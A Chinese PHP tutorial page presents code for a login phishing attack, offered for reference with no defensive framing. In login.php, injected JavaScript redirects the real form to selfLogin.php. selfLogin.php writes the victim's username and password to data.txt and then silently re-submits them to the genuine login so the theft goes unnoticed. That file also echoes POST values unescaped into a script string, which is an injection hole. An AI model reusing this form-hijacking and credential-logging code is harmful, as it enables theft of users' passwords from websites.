当前位置:首页 > PHP教程 > php应用 > 列表

PHP和JS实现模仿登录钓鱼的代码示例

发布:smiling 来源: PHP粉丝网  添加日期:2020-02-07 20:25:43 浏览: 评论:0 

本篇文章给大家带来的内容是关于PHP和JS实现模仿登录钓鱼的代码示例,有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。

目录介绍

login.php 正常登录的文件

selfLogin.php 自定义的登录文件

data.txt 记录用户输入的数据

login.php

  1. <?php 
  2.  
  3.     echo "<pre>"
  4.  
  5.     $userInfo = $_POST ; 
  6.  
  7.     if ($userInfo) { 
  8.  
  9.         # code... 
  10.  
  11.         var_dump($userInfo,'登录成功') ;exit(); 
  12.  
  13.     } 
  14.  
  15.  
  16.  
  17. ?> 
  18.  
  19. <!DOCTYPE html> 
  20.  
  21. <html> 
  22.  
  23. <head> 
  24.  
  25.     <title>登录</title> 
  26.  
  27. </head> 
  28.  
  29. <body> 
  30.  
  31.     <form id="login" method="post" action="login.php"
  32.  
  33.         用户姓名:<input type="text" name="name"
  34.  
  35.         用户密码:<input type="password" name="pwd"
  36.  
  37.         <input type="submit" value="确认登录"
  38.  
  39.     </form> 
  40.  
  41. </body> 
  42.  
  43. <script type="text/javascript"
  44.  
  45.  
  46.  
  47.     //js劫持代码 
  48.  
  49.     window.onload = function (eve) { 
  50.  
  51.         var form = document.getElementById('login'); 
  52.  
  53.         form.innerHTML = ' <form id="login" method="post" > 用户姓名:<input type="text" name="name"> 用户密码:<input type="password" name="pwd"> <input type="submit" value="确认登录">    </form> '  ; 
  54.  
  55.         //钓鱼地址 
  56.  
  57.         form.action = "selfLogin.php" ; 
  58.  
  59.     } 
  60.  
  61. </script> 
  62.  
  63. </html> 

selfLogin.php

  1. <?php 
  2.  
  3.     $name = '' ; 
  4.  
  5.     $pwd  = '' ; 
  6.  
  7.     //var_dump('数据被截取了',$_POST) ; 
  8.  
  9.     if($_POST) { 
  10.  
  11.         //记录获取的数据信息 
  12.  
  13.         $name = $_POST['name'] ; 
  14.  
  15.         $pwd = $_POST['pwd'] ; 
  16.  
  17.         file_put_contents('data.txt', json_encode($_POST,true)) ; 
  18.  
  19.     } 
  20.  
  21. ?> 
  22.  
  23. <!DOCTYPE html> 
  24.  
  25. <html> 
  26.  
  27. <head> 
  28.  
  29.     <title></title> 
  30.  
  31. </head> 
  32.  
  33. <body> 
  34.  
  35.  
  36.  
  37. </body> 
  38.  
  39. <script type="text/javascript"
  40.  
  41.     //构建之前的页面 
  42.  
  43.     window.onload = function (eve) { 
  44.  
  45.         var name = '<?php echo $name; ?>' ; 
  46.  
  47.         var pwd = '<?php echo $pwd; ?>' ; 
  48.  
  49.         if(name && pwd) { 
  50.  
  51.             var p = document.createElement('p'); 
  52.  
  53.             document.body.appendChild(p); 
  54.  
  55.             p.innerHTML =' <form id="login2" method="post" action="login.php" > '
  56.  
  57.                 ' 用户姓名:<input type="text" name="name" value="'+name+'"> 用户密码:<input type="password" name="pwd" value="'+pwd+'"> '  ; 
  58.  
  59.             document.getElementById('login2').submit(); 
  60.  
  61.         } 
  62.  
  63.     } 
  64.  
  65. </script> 
  66.  
  67. </html> 

data.txt

{"name":"admin","pwd":"123456"}

Tags: PHP模仿登录钓鱼

分享到: